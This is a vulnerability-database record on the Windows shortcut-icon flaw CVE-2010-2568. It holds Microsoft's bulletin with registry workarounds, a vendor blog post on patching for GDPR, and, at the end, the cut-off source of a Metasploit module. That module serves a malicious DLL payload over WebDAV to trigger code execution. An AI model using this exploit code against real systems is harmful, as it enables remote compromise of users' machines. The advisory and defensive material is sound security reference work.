CVE-2010-2568\tAggregate Severity Rating\r\n\r\nWindows XP Service Pack 3\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Vista Service Pack 1 and Windows Vista Service Pack 2\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows 7 for 32-bit Systems\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows 7 for x64-based Systems\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2008 R2 for x64-based Systems*\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2008 R2 for Itanium-based Systems\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, whether or not installed using the Server Core installation option. For more information on this installation option, see the TechNet articles, Managing a Server Core Installation and Servicing a Server Core Installation. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nShortcut Icon Loading Vulnerability - CVE-2010-2568\r\n\r\nA remote code execution vulnerability exists in affected versions of Microsoft Windows. The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the operating system displays the icon of a malicious shortcut file. An attacker who successfully exploited this vulnerability could run arbitrary code as the logged-on user. This update addresses a vulnerability previously discussed in Microsoft Security Advisory 2286198.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-2568.\r\n\t\r\nMitigating Factors for Shortcut Icon Loading Vulnerability - CVE-2010-2568\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nAn attacker who successfully exploits this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nFor the USB removable device attack vector, when AutoPlay is disabled, the user would manually have to launch Windows Explorer or a similar application and browse to the affected folder of the removable disk.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Shortcut Icon Loading Vulnerability - CVE-2010-2568\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable the displaying of icons for shortcuts\r\n\r\nNote See Microsoft Knowledge Base Article 2286198 to use the automated Microsoft Fix it solution to enable or disable this workaround. This Fix it solution requires a restart upon completion in order to be effective. This Fix it solution deploys the workaround, and thus has the same user impact. We recommend that administrators review the KB article closely prior to deploying this Fix it solution.\r\n\r\nNote Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the &quot;Changing Keys And Values&quot; Help topic in Registry Editor &#40;Regedit.exe&#41; or view the &quot;Add and Delete Information in the Registry&quot; and &quot;Edit Registry Data&quot; Help topics in Regedt32.exe.\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type Regedit in the Open box, and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nLocate and then select the following registry key:\r\n\r\nHKEY_CLASSES_ROOT&#92;lnkfile&#92;shellex&#92;IconHandler\r\n\r\n3.\r\n\t\r\n\r\nClick the File menu and then click Export.\r\n\r\n4.\r\n\t\r\n\r\nIn the Export Registry File dialog box, enter LNK_Icon_Backup.reg and then click Save.\r\n\r\nNote This will create a backup of this registry key in the My Documents folder by default.\r\n\r\n5.\r\n\t\r\n\r\nSelect the value &#40;Default&#41; on the right pane in the Registry Editor. Press Enter to edit the value of the key. Delete the value, so that the value is blank, and press Enter.\r\n\r\n6.\r\n\t\r\n\r\nLocate and then select the following registry key:\r\n\r\nHKEY_CLASSES_ROOT&#92;piffile&#92;shellex&#92;IconHandler\r\n\r\n7.\r\n\t\r\n\r\nClick the File menu and then click Export.\r\n\r\n8.\r\n\t\r\n\r\nIn the Export Registry File dialog box, enter PIF_Icon_Backup.reg and then click Save.\r\n\r\nNote This creates a backup of this registry key in the My Documents folder by default.\r\n\r\n9.\r\n\t\r\n\r\nSelect the value &#40;Default&#41; on the right pane in the Registry Editor. Press Enter to edit the value of the key. Delete the value, so that the value is blank, and press Enter.\r\n\r\n10.\r\n\t\r\n\r\nLog all users off and on again, or restart the computer.\r\n\r\nImpact of workaround. Disabling icons from being displayed for shortcuts prevents the issue from being exploited on affected systems. When this workaround is implemented, the system may display most icons as a &quot;white&quot; default object icon, which does impact usability. We recommend that system administrators test this workaround thoroughly prior to deployment. When the workaround is undone, all icons will reappear.\r\n\r\nHow to undo the workaround.\r\n\r\nUsing the interactive method\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type Regedit in the Open box, and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nClick the File menu and then click Import.\r\n\r\n3.\r\n\t\r\n\r\nIn the Import Registry File dialog box, select LNK_Icon_Backup.reg, and then click Open.\r\n\r\n4.\r\n\t\r\n\r\nClick the File menu and then click Import.\r\n\r\n5.\r\n\t\r\n\r\nIn the Import Registry File dialog box, select PIF_Icon_Backup.reg, and then click Open.\r\n\r\n6.\r\n\t\r\n\r\nExit Registry Editor, and then restart the computer.\r\n\r\nManually resetting the Registry key values to the default values\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type Regedit in the Open box, and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nLocate and then click the following registry key:\r\n\r\nHKEY_CLASSES_ROOT&#92;lnkfile&#92;shellex&#92;IconHandler\r\n\r\n3.\r\n\t\r\n\r\nReset the registry key value to:\r\n\r\n{00021401-0000-0000-C000-000000000046}\r\n\r\n4.\r\n\t\r\n\r\nLocate and then click the following registry key:\r\n\r\nHKEY_CLASSES_ROOT&#92;piffile&#92;shellex&#92;IconHandler\r\n\r\n5.\r\n\t\r\n\r\nReset the registry key value to:\r\n\r\n{00021401-0000-0000-C000-000000000046}\r\n\r\n6.\r\n\t\r\n\r\nRestart the computer\r\n\u2022\t\r\n\r\nDisable the WebClient service\r\n\r\nDisabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning &#40;WebDAV&#41; client service. After applying this workaround it is still possible for remote attackers who successfully exploit this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user&#39;s computer or the Local Area Network &#40;LAN&#41;, but users will be prompted for confirmation before opening arbitrary programs from the Internet.\r\n\r\nTo disable the WebClient Service, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type Services.msc and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nRight-click WebClient service and select Properties.\r\n\r\n3.\r\n\t\r\n\r\nChange the Startup type to Disabled. If the service is running, click Stop.\r\n\r\n4.\r\n\t\r\n\r\nClick OK and exit the management application.\r\n\r\nImpact of workaround. When the WebClient service is disabled, Web Distributed Authoring and Versioning &#40;WebDAV&#41; requests are not transmitted. In addition, any services that explicitly depend on the Web Client service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer.\r\n\r\nHow to undo the workaround.\r\n\r\nTo re-enable the WebClient Service, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type Services.msc and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nRight-click WebClient service and select Properties.\r\n\r\n3.\r\n\t\r\n\r\nChange the Startup type to Automatic. If the service is not running, click Start.\r\n\r\n4.\r\n\t\r\n\r\nClick OK and exit the management application.\r\n\u2022\t\r\n\r\nBlock the download of LNK and PIF files from the Internet\r\n\r\nBlocking the download of LNK and PIF files on the Internet Gateway provides protection against remote exploitation of these attacks. Note that the files can be transferred over WebDAV, so any blocking solution should take this protocol into account.\r\n\u2022\t\r\n\r\nBlock outbound SMB connections on the perimeter firewall\r\n\r\nBlocking outbound SMB connections on the perimeter firewall reduces the risk of remote exploitation using file shares.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Shortcut Icon Loading Vulnerability - CVE-2010-2568\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nWhen attempting to load the icon of a shortcut, the Windows Shell does not correctly validate specific parameters of the shortcut.\r\n\r\nWhat is the Windows Shell? \r\nThe Windows user interface &#40;UI&#41; provides users with access to a wide variety of objects necessary for running applications and managing the operating system. The most numerous and familiar of these objects are the folders and files that reside on computer disk drives. There are also a number of virtual objects that allow the user to perform tasks such as sending files to remote printers or accessing the Recycle Bin. The Shell organizes these objects into a hierarchical namespace and provides users and applications with a consistent and efficient way to access and manage objects.\r\n\r\nWhat is a shortcut? \r\nA shortcut is a link to a file or program, represented by an icon. If you double-click a shortcut, the file or program opens. The shortcut is a mechanism often used to keep frequently used files in a single, easily accessed location, such as a folder or the desktop. Shortcuts are implemented as files with the LNK extension. In addition, shortcuts can also appear as PIF files when they are related to MS-DOS programs.\r\n\r\nWill this security update disable the workaround or Microsoft Fix it solution, if I have previously implemented it? \r\nNo, the workaround and Microsoft Fix it solution operate independently from the security update. After the security update has been implemented, users who have applied the workaround need to undo it.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could run arbitrary code as the logged-on user. If a user is logged on with administrative user rights, an attacker could take complete control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could present a removable drive to the user with a malicious shortcut file, and an associated malicious binary. When the user opens this drive in Windows Explorer, or any other application that parses the icon of the shortcut, the malicious binary will execute code of the attacker\u2019s choice on the target system.\r\n\r\nAn attacker could also set up a malicious Web site or a remote network share and place the malicious components on this remote location. When the user browses the Web site using a Web browser such as Internet Explorer or a file manager such as Windows Explorer, Windows attempts to load the icon of the shortcut file, invoking the malicious binary. In addition, an attacker could embed an exploit in a document that supports embedded shortcuts or a hosted browser control &#40;such as but not limited to Microsoft Office documents&#41;.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nDesktop systems used to browse untrusted network shares or untrusted Web sites are most at risk from this vulnerability.\r\n\r\nWhat does the update do? \r\nThe update addresses this vulnerability by correctly validating the icon reference of a shortcut.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2010-2568.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nAt the time this security bulletin was released, this vulnerability was being exploited by a number of malware families.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nSergey I. Ulasen and Uleg Kopreev of VirusBlokAda for reporting the Shortcut Icon Loading Vulnerability &#40;CVE-2010-2568&#41;\r\n\u2022\t\r\n\r\nAndreas Marx and Maik Morgenstern of AV-Test for reporting the Shortcut Icon Loading Vulnerability &#40;CVE-2010-2568&#41;\r\n\u2022\t\r\n\r\nWill Dormann of CERT/CC for working with us on the Shortcut Icon Loading Vulnerability &#40;CVE-2010-2568&#41;\r\n\u2022\t\r\n\r\nNiels Teusink for working with us on the Shortcut Icon Loading Vulnerability &#40;CVE-2010-2568&#41;\r\n\u2022\t\r\n\r\nStefan Kanthak for working with us on the Shortcut Icon Loading Vulnerability &#40;CVE-2010-2568&#41;\r\nTop of sectionTop of section\r\nMicrosoft Active Protections Program &#40;MAPP&#41;\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program &#40;MAPP&#41; Partners.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided &quot;as is&quot; without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 &#40;August 2, 2010&#41;: Bulletin published.", "edition": 1, "modified": "2010-08-03T00:00:00", "published": "2010-08-03T00:00:00", "id": "SECURITYVULNS:DOC:24364", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24364", "title": "Microsoft Security Bulletin MS10-046 - Critical Vulnerability in Windows Shell Could Allow Remote Code Execution &#40;2286198&#41;", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "qualysblog": [{"lastseen": "2019-01-23T20:50:13", "bulletinFamily": "blog", "cvelist": ["CVE-2010-2568"], "description": "If your organization needs a compelling reason for establishing or enhancing its vulnerability management program, circle this date in bold, red ink on your corporate calendar: May 25, 2018.\n\n\n\nOn that day, the EU's General Data Protection Regulation (GDPR) goes into effect, intensifying the need for organizations to painstakingly protect EU residents\u2019 data from accidental mishandling and foul play.\n\nWhile complying with GDPR involves adopting and modifying a variety of IT systems and business processes, having comprehensive and effective vulnerability management should be key in your efforts.\n\nWhy? Too many preventable data breaches occur because hackers exploit well-known vulnerabilities for which patches are available but haven\u2019t been installed.\n\nThis happens because many organizations, including large ones with sophisticated IT infrastructures and resources, lack [visibility into their IT assets and their vulnerabilities](<https://blog.qualys.com/technology/2017/06/28/countdown-to-gdpr-get-2020-visibility-into-your-it-assets>). Flying blind, they fail to [detect and remediate on a timely basis](<https://blog.qualys.com/news/2017/07/11/countdown-to-gdpr-prioritize-vulnerability-remediation>) critical bugs, leaving them like low-hanging fruit for cyber data thieves to feast on.\n\nIn this installment of our [GDPR preparedness series](<https://blog.qualys.com/news/2017/06/21/countdown-to-gdpr-reduce-your-risk>), we\u2019ll dive into the topic of vulnerability management and its importance for staying compliant with this regulation. GDPR carries hefty penalties and fines, including one of \u20ac20 million or 4% of annual revenue, whichever is higher, and applies to companies worldwide that handle EU residents\u2019 personal data.\n\n### GDPR: A Fierce Regulation for EU Customer Data Protection\n\nYou won\u2019t find detailed prescriptions for specific processes and technologies required for compliance in[ the text of GDPR](<http://ec.europa.eu/justice/data-protection/reform/files/regulation_oj_en.pdf>). What the 88-page document makes abundantly clear is that both data \u201ccontrollers\u201d and data \u201cprocessors\u201d must protect EU customer information through _\u201cappropriate technical and organisational measures.\u201d_\n\nThe regulation also stresses the need for organizations to have in place secure IT networks and systems that can \u201cresist, at a given level of confidence, accidental events or unlawful or malicious actions.\u201d\n\n\u201cThis could, for example, include preventing unauthorised access to electronic communications networks and malicious code distribution and stopping \u2018denial of service\u2019 attacks and damage to computer and electronic communication systems,\u201d reads the document.\n\nIn the context of GDPR, this means you must do whatever is in your power to prevent accidental or malicious incidents that compromise the \u201cavailability, authenticity, integrity and confidentiality of stored or transmitted personal data.\u201d\n\nAs a basic, foundational InfoSec practice, effective vulnerability management should be a core component of complying with GDPR and its requirements for the protection of EU residents\u2019 personal data.\n\n### Immunize Your IT Environment Against Vulnerability Exploits\n\nEvery vulnerability that has been publicly disclosed represents a potential opportunity for hackers looking to break into your network.\n\nWhen you methodically, strategically and continuously detect, assess and remediate these bugs, whether through patching or mitigation, you eliminate entry points for cyber criminals, systematically and consistently lowering your risk.\n\nWith proper vulnerability management, you \u201cimmunize\u201d your IT assets against opportunistic attacks which are designed to exploit common, well-known bugs and which are the most likely to hit your network.\n\nIn its [2016 Data Breach Investigations Report (DBIR)](<http://www.verizonenterprise.com/resources/reports/rp_DBIR_2016_Report_en_xg.pdf>), Verizon said hackers view as \u201coldies that are still goodies\u201d these long-disclosed CVEs (Common Vulnerabilities and Exposures) which remain unpatched in many organizations. \u201cHackers use what works, and what works doesn\u2019t seem to change all that often,\u201d reads that study.\n\nTo exploit these well-known vulnerabilities, hackers don\u2019t use sophisticated, carefully crafted attacks, but rather aim for volume. \u201cThey automate certain weaponized vulnerabilities and spray and pray them across the Internet, sometimes yielding incredible success,\u201d states the Verizon study.\n\nFor example, Kaspersky Lab recently[ reported that exploits to CVE-2010-2568](<https://securelist.com/exploits-how-great-is-the-threat/78125/>) \u2014 the one used in the Stuxnet campaign years ago \u2014 ranked first in 2016 in terms of the number of users attacked, even though a patch for it has been available since 2010.\n\n\u201cThe conclusion is a simple one: even if a malicious user doesn\u2019t have access to expensive zero-days, the chances are high that they\u2019d succeed with exploits to old vulnerabilities because there are many systems and devices out there that have not yet been updated,\u201d Kaspersky stated.\n\nEven if you\u2019re not leaving critical vulnerabilities unpatched for years, you must make sure you\u2019re as quick as possible in your remediation work.\n\nSANS Institute\u2019s second annual survey on continuous monitoring (CM) programs \u2014 titled [\u201cReducing Attack Surface\u201d](<https://www.qualys.com/forms/whitepapers/reducing-attack-surface-sans-second-2016-survey-continuous-monitoring-programs?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=gdpr-q3-2017&utm_content=whitepaper&leadsource=344554475>) and published Nov. 2016 \u2014 found that only 10% of respondents were able to remediate critical vulnerabilities in 24 hours or less, which is the ideal scenario. According to SANS, breach risk reaches moderate levels at the one-week mark and becomes high when a vulnerability remains in a critical system for a month or longer.\n\nA good example of why time is of the essence when dealing with critical vulnerabilities was the WannaCry ransomware rampage that created chaos worldwide in May. WannaCry[ spread using EternalBlue](<https://blog.qualys.com/news/2017/05/19/no-more-tears-wannacry-highlights-importance-of-prompt-precise-vulnerability-remediation>), an exploit for a Windows OS vulnerability ([MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) that Microsoft had patched in March and had rated as \u201cCritical\u201d due to the potential for attackers to execute remote code in affected systems.\n\nSimply put, if most organizations had patched that vulnerability promptly, or at least within a month after its disclosure, WannaCry would have been a non-event. Instead,[ it infected hundreds of thousands of computers](<https://www.wired.com/2017/05/ransomware-meltdown-experts-warned/>) in about 150 countries, severely disrupted the operation of hospitals, utilities, manufacturing plants, telecommunications companies, transportation providers, government agencies and financial institutions, and caused[ an estimated $4 billion in losses](<http://www.cbsnews.com/news/wannacry-ransomware-attacks-wannacry-virus-losses/>).\n\nDespite the global mayhem caused by WannaCry, which major media outlets covered exhaustively, a[ researcher found more than 50,000 machines still vulnerable to EternalBlue](<http://www.darkreading.com/vulnerabilities---threats/50000-machines-remain-vulnerable-to-eternalblue-attacks/d/d-id/1329361>) as recently as mid-July.\n\nThat\u2019s just one example that illustrates why effective vulnerability management is such an important InfoSec practice.\n\n### Vulnerability Management: Cornerstone of InfoSec\n\n\u201cContinuous Vulnerability Assessment and Remediation\u201d stands as the fourth most important practice in the Center for Internet Security\u2019s (CIS)[ 20 Critical Security Controls](<https://www.cisecurity.org/controls/>).\n\nCIS estimates that an organization that implements its first five controls \u2014 which collectively are considered foundational for cyber security \u201chygiene\u201d \u2014 is able to protect itself against 85 percent of attacks.\n\n\u201cOrganizations that do not scan for vulnerabilities and proactively address discovered flaws face a significant likelihood of having their computer systems compromised,\u201d[ CIS states](<https://www.cisecurity.org/controls/continuous-vulnerability-assessment-and-remediation/>).\n\nThus, an InfoSec team with flawed or non-existent vulnerability management is at a high risk for data breaches, and, consequently, for GDPR non-compliance.\n\nEffective vulnerability management requires continuously identifying threats, monitoring changes in your network, discovering and mapping all your devices and software \u2014 including new, unauthorized and forgotten ones \u2014, and reviewing configuration details for each asset.\n\nYou need global visibility into your systems\u2019 vulnerabilities to stay ahead of attackers, especially today, as digitalization blurs the traditional boundaries of IT perimeters and exposes more and more IT assets on the Internet. \n\n### Qualys Vulnerability Management\n\n[Qualys\u2019 cloud-based Vulnerability Management](<https://www.qualys.com/suite/vulnerability-management/>) (VM) continuously identifies exposures so you can defend your organization against attacks anytime, anywhere.\n\nVM maps all assets on the network, detailing their OS, ports, services and certificates, and scans them for vulnerabilities with Six Sigma 99.99966 percent accuracy. It assigns remediation tickets, manages exceptions, lists patches for each host and integrates with existing IT ticketing systems.\n\nIn addition, VM generates comprehensive reports customized for different recipients \u2014 like IT pros, business executives or auditors \u2014 and incorporates context and insight, including progress against goals. Via VM\u2019s APIs, the reporting data can be integrated with other security and compliance systems.\n\nWhen VM is paired with the [Qualys Continuous Monitoring](<https://www.qualys.com/suite/continuous-monitoring/>) (CM) app, you\u2019ll be alerted about potential threats \u2014 such as new hosts/OSes, expiring certificates, unexpected open ports and unauthorized software \u2014 so problems can be tackled before turning into breaches. \n\n\u201cContinuous monitoring is quickly coming to the forefront as a key activity for the ongoing security of networks, systems and, by extension, enterprises,\u201d reads the 2015 SANS Institute continuous monitoring report[ \u201cWhat Are Their Vulnerabilities?\u201d](<http://www.sans.org/reading-room/whitepapers/analyst/vulnerabilities-survey-continuous-monitoring-36377>)\n\nWith Qualys CM, you can keep an eye on your global network from the cloud, like hackers are doing right now, and alert the appropriate people to critical security issues, like unexpected network changes.\n\nIn addition to Qualys scanners, VM also works with the groundbreaking Qualys Cloud Agents, extending its network coverage to assets that can\u2019t be scanned. These lightweight, all-purpose, self-updating agents reside on the assets they monitor \u2014 no scan windows, credentials or firewall changes needed \u2014 so vulnerabilities are found faster with minimal network impact.\n\nVM also supports your organization\u2019s digital transformation efforts through its capacity to monitor hybrid IT environments that include not only on-premises hardware and software but also cloud workloads, mobile devices, IoT systems, DevOps continuous app development and deployment pipelines and other disruptive technologies.\n\n### Stay on the Right Side of GDPR with Qualys\n\nNew software vulnerabilities are disclosed daily \u2014 to the tune of thousands per year \u2014 so organizations must know at all times which vulnerabilities are present in their IT assets \u2014 on-premises, in clouds, and on endpoints \u2014; understand the level of risk each one carries; and plan remediation of affected IT assets accordingly.\n\n\u201cVulnerability management has been a Sisyphean endeavor for decades. Attacks come in millions, exploits are automated and every enterprise is subject to the wrath of the quick-to-catch-on hacker. What\u2019s worse, new vulnerabilities come out every day,\u201d reads[ Verizon\u2019s 2016 DBIR](<http://www.verizonenterprise.com/verizon-insights-lab/dbir/2016/>).\n\nIf an InfoSec team patches, remediates, and mitigates the right vulnerabilities at the right time, its organization will avoid falling prey to most cyber attacks, and slash its risk of suffering a data breach, whose consequences could include GDPR penalties.\n\nWith Qualys VM, you\u2019ll be able to consistently address critical vulnerabilities in your most important IT assets on a timely basis, putting your organization in a solid position to withstand the daily attacks from hackers seeking to exploit unpatched gaps and compromise your customer data. \n\nWith an effective vulnerability management program in place, you\u2019ll be a lot more confident about complying with GDPR when dawn breaks on the morning of May 25, 2018.\n\n### Read Other Posts in the Countdown to GDPR Series:\n\n * [Reduce Your Risk](<https://blog.qualys.com/news/2017/06/21/countdown-to-gdpr-reduce-your-risk>)\n * [Get 20/20 Visibility Into Your IT Assets](<https://blog.qualys.com/technology/2017/06/28/countdown-to-gdpr-get-2020-visibility-into-your-it-assets>)\n * [Prioritize Vulnerability Remediation](<https://blog.qualys.com/news/2017/07/11/countdown-to-gdpr-prioritize-vulnerability-remediation>)\n * [Assess Vendor Risk](<https://blog.qualys.com/news/2017/07/19/countdown-to-gdpr-assess-vendor-risk>)\n * [IT Policy Compliance](<https://blog.qualys.com/news/2017/08/09/countdown-to-gdpr-it-policy-compliance>)\n * [Web Application Security](<https://blog.qualys.com/news/2018/02/05/for-gdpr-compliance-web-app-security-is-a-must>)\n\n* * *\n\n_To learn more about how Qualys solutions can help you become GDPR compliant, visit _[_qualys.com/gdpr _](<https://lps.qualys.com/GDPR_lp.html?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=gdpr-q3-2017&utm_content=trial&leadsource=344554475>)_where you can download our _**_free guide_**_ and watch our_**_ webcast_**_._\n\n_(Jimmy Graham is a Director of Product Management at Qualys.)_", "modified": "2017-08-02T15:27:04", "published": "2017-08-02T15:27:04", "id": "QUALYSBLOG:515F885592B6DF57D6F93B1D92D2782D", "href": "https://blog.qualys.com/news/2017/08/02/countdown-to-gdpr-manage-vulnerabilities", "type": "qualysblog", "title": "Countdown to GDPR: Manage Vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-08-27T01:31:46", "description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.\n", "published": "2010-08-04T02:21:20", "type": "metasploit", "title": "Microsoft Windows Shell LNK Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "modified": "2019-05-23T12:01:21", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS10_046_SHORTCUT_ICON_DLLLOADER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n #\n # This module acts as an HTTP server\n #\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t\t=> 'Microsoft Windows Shell LNK Code Execution',\n 'Description'\t=> %q{\n This module exploits a vulnerability in the handling of Windows\n Shortcut files (.LNK) that contain an icon resource pointing to a\n malicious DLL. This module creates a WebDAV service that can be used\n to run an arbitrary payload when accessed as a UNC path.\n },\n 'Author'\t\t=>\n [\n 'hdm', # Module itself\n 'jduck', # WebDAV implementation, UNCHOST var\n 'B_H' # Clean LNK template\n ],\n 'License'\t\t=> MSF_LICENSE,\n 'References'\t=>\n [\n ['CVE', '2010-2568'],\n ['OSVDB', '66387'],\n ['MSB', 'MS10-046']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload'\t\t=>\n {\n 'Space'\t=> 2048,\n },\n 'Platform'\t\t=> 'win',\n 'Targets'\t\t=>\n [\n [ 'Automatic',\t{ } ]\n ],\n 'DisclosureDate' => 'Jul 16 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptPort.new(\t'SRVPORT',\t\t [ true, \"The daemon port to listen on (do not change)\", 80 ]),\n OptString.new(\t'URIPATH',\t\t [ true, \"The URI to use (do not change).\", \"/\" ]),\n OptString.new( 'UNCHOST', [ false, \"The host portion of the UNC path to provide to clients (ex: 1.2.3.4).\" ])\n ])\n\n deregister_options('SSL', 'SSLVersion') # Just for now\n end\n\n def on_request_uri(cli, request)\n\n case request.method\n when 'OPTIONS'\n process_options(cli, request)\n when 'PROPFIND'\n process_propfind(cli, request)\n when 'GET'\n process_get(cli, request)\n else\n print_error(\"Unexpected request method encountered: #{request.method}\")\n resp = create_response(404, \"Not Found\")\n resp.body = \"\"\n resp['Content-Type'] = 'text/html'\n cli.send_response(resp)\n end\n\n end\n\n def process_get(cli, request)\n\n myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n webdav = \"\\\\\\\\#{myhost}\\\\\"\n\n if (request.uri =~ /\\.dll$/i)\n print_status \"Sending DLL payload\"\n return if ((p = regenerate_payload(cli)) == nil)\n data = generate_payload_dll({ :code => p.encoded })\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' 